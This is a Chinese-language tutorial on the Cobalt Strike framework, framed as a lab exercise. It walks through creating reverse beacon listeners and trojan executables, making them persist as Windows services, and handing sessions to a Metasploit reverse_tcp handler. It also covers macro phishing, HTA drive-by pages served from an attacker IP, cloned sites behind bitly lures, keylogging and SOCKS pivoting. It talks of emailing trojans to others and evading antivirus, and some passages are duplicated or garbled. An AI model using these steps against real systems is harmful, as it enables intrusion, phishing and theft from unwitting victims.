CobaltStrike是一款美国RedTeam开发的渗透测试神器，常被业界人称为CS。最近这个工具大火，成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式，集成了提权，凭据导出，端口转发，socket代理，office攻击，文件捆绑，钓鱼等功能。同时，CobaltStrike还可以调用Mimikatz等其他知名工具，因此广受黑客喜爱。

CobaltStrike分为客户端和服务端可分布式操作可以协同作战。但一定要架设在外网上。当然你知道利用这款工具主要用于内网渗透以及APT攻击。

项目官网:https://www.cobaltstrike.com

实验环境：

服务器端（Linux）：192.168.0.109靶机（windows）:192.168.19.130

使用cobaltstrike 3.14

实验步骤

将工具上传到kali系统中运行时给777权限

root@kali:/mnt/cobaltstrike# chmod 777

/mnt/cobaltstrike/

一、启动，连接服务器

启动服务端：(test 为待会靶机连接服务器的密码）./teamserver 192.168.19.146 test

Test为密码hash密码要与客户端一样诺不一样则此软件存在后面

客户端连接服务器运行：cobalstrike.bat

启动客户端，输入ip，密码，端口，用户默认

如果客户端 是Linux操作系统则运行以下命令，启动客户端：java -Dfile.encoding=UTF-8

-javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap

-XX:+UseParallelGC -jar cobaltstrike.jar

创建监听器。4.0一、创建监听器

1、点击 Cobalt Strike ->

Listeners->Add，其中内置了八个Payload，

wndows/beacon_dns/reverse_dns_txt

windows/beacon_http/reverse_http

windows/beacon_https/reverse_https

windows/beacon_bind_pipe

windows/beacon_tcp

windows/beacon_extc2

windows/foreign/reverse_http

windows/foreign/reverse_https

生成木马创建payload 让主机上线

运行该exe主机成功上线：可以查看上线主机的磁盘信息，进行端口扫描，查看进程等信息。

同理如果将生成的artifact.exe作为附件发送给其他人，只要有人点击，则他的机器会上线。不过现在的电脑都装了杀毒软件，所以payload需做免杀。这个后续在研发

HttpsPayload应用

优点：可能过行为查杀、另外administrator运行可直接提升为system权限

第一步

Windows Service需要向操作系统注册EXE直接运行  

第二步：创建服务

Sc create test binpath= ”c:\test.exe”      //创建的服务名，binPath后面是运行exe文件的所在路径    创建一个路径一般放在C:\Windows\System32下因为这个路径执行文件最多

start= auto displayname= ”test”          //将exe注册为windows服务 displayname服务器名称

Sc start test                    //开启这个服务

Sc delete test                   //删除这个服务

Sc top test                       //首先使用这个服务 

sc配置服务

有以下集中方式：

sc config 服务名 start= AUTO    (自动)

sc config 服务名 start= DEMAND  (手动)

sc config 服务名 start= DISABLED(禁用)

三、关于SC

可参考一个网友的博文---SC命令管理服务状态：http://blog.csdn.net/ddjj_1980/article/details/7493045

1、结合metasploit,反弹shell

1. MSF中use exploit/multi/handler，然后set payload windows/meterpreter/reverse_tcp、set lhost、set lport；然后CS中新建监听器；一个test社工肉鸡运行，然后新建监听器reverse_tcp派生会话，run：

新建两个监听器一个放木马上线

在靶机中使用Cobalt Strike创建一个windows/foreign/reverse_tcp的Listener。其中ip为Metasploit的ip地址，端口为Metasploit所监听的端口。

选中刚刚新建msf

session -i查看会话然后session -i 1进入

派生给reverse_tcp然后Exploit

2、office宏钓鱼

攻击→后门→MS office 然后复制恶意代码→插入office的宏中，社工肉鸡打开即可

 MSF中use exploit/multi/handler，然后set payload windows/meterpreter/reverse_tcp、set lhost、set lport；然后CS中新建监听器；一个test社工肉鸡运行，然后新建监听器reverse_tcp派生会话，run：或使用另一个监听器可以直接在图形化界面使用

或使用另一个监听器可以直接在图形化界面使用

下载运行则中招

Cs 生成的代码直接放到创建里面去，注意：做试验的时候，宏的位置不要设置所有的活动模板和文档，建设应用在当前文档，不然本机所有word文档运行都会种上你的木马，另外打开word文档有宏提示，一般是word默认禁用所有宏（文件—选项—信任中心—信任中心设置里面配置）。

3、hta网页挂马

第一步：生成hta

第二步：使用文件下载

点击开始之后，evil.hta文件会自动传到cs uploads目录。

如果之前设置过钓鱼页面，记得一定要删掉，不然会克隆的时候会报错

总结：

1. 先制作HTML：http://192.168.1.184:80/test.hta

2. 钓鱼攻击→文件下载：http://192.168.1.184:80/download/file.ext

3. 钓鱼攻击→克隆网站：http://192.168.1.184:80/

4. 社工肉鸡打开：

键盘记录

4、邮件钓鱼

1. 邮件钓鱼：

附件下载后运行

5. 信息收集

制作好钓鱼页面：可以使用https://bitly.com制作短网址，然后让对方打开：

然后设置好跳转的网址

以通过https://bitly.com生成url短链接 （）   

6. socks代理：

win7双网卡：内网：172.16.2.1    

win2003：172.16.2.2

win7双网卡

2003内网：172.16.2.1

MSF中：setg Proxies socks4:192.168.1.184:40520；use auxiliary/scanner/smb/smb_version；然后set rhosts 172.16.2.2；run

setg Proxiessocks4:192.168.0.106:6677

也可以使用下面方法：

开启socks4a代理，通过代理进行内网渗透

开启socks，可以通过命令，也可以通过右键Pivoting->SOCKS Server

beacon> socks2222

[+] startedSOCKS4a server on: 2222

[+] host calledhome, sent: 16 bytes

然后vim

/etc/proxychains.conf ，在文件末尾添加socks4代理服务器

使用proxychains代理扫描内网主机  proxychains nmap -sP192.168.183.0/24

小结：

1. CS可以创建多个客户端，操作方便

2. 功能扩展比较多，如：payload可以多种语言。

3. 支持宏的办公软件都可以（office/WPS）

4. 默认宏安全性高/非常安全，运行宏时会提示；中低不会提示，打开world有提示，说明宏很有可能有木马。

cs提权

你以什么权限运行的木马，那么木马将拥有此权限，如果权限过低我们只能进行提权。

提权插件下载https://github.com/rsmudge/Elevatekit

http://k8gege.org/Download/

https://github.com/k8gege/Aggressor

选择脚本管理器将下载好的插件放入进去不要有中午目录

内网渗透插件加使用方法

https://github.com/k8gege/Aggressor